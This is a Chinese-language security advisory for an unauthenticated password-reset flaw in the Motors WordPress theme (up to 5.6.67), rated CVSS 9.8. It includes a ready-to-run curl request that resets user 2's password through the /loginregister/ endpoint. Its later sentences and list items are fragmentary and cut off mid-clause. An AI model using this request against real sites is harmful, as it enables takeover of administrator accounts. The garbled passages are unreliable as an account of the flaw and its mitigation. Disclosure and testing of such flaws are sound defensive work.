Motors WordPress 主题在所有版本(包括 5.6.67)中存在未授权权限提升漏洞,可通过账户接管利用。该漏洞源于主题在更新用户密码前未正确验证用户身份。这使得未认证攻击者能够更改任意用户(包括管理员)的密码,并借此获取其账户访问权限。
CNA:Wordfence 基础评分:9.8 ⚫ 严重 向量:CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
5.6.67 - 通过密码更新/账户接管实现的未授权权限提升5.6.67Motors WordPress 主题(最高版本 5.6.67)在其密码重置功能中存在一个严重的身份验证缺陷。
该主题通过端点提供前端密码更新机制,但在处理密码更改前未能正确验证用户身份或授权。
因此,未认证攻击者可以通过发送精心构造的 HTTP 请求,提供 user_id、任意 hash_check 和新密码 (stm_new_password) 来重置任意用户(包括管理员)的密码。
如果被利用,攻击者可:
curl "https://local.ization/loginregister/?user_id=2&hash_check=%C0" --data "stm_new_password=randomizer" -XPOST -v -H 'User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Mobile Safari/537.36'
/login、/register、/loginregister 等端点暴露了前端密码重置处理程序。user_id、hash_check 和 stm_new_password。hash_check,系统就会盲目处理密码更改。/loginregister/ 或类似前端端点的访问。user_id 或 hash_check 而不进行服务器端验证。本报告仅用于教育和授权安全测试目的。 未经许可利用此漏洞可能违反法律和道德界限。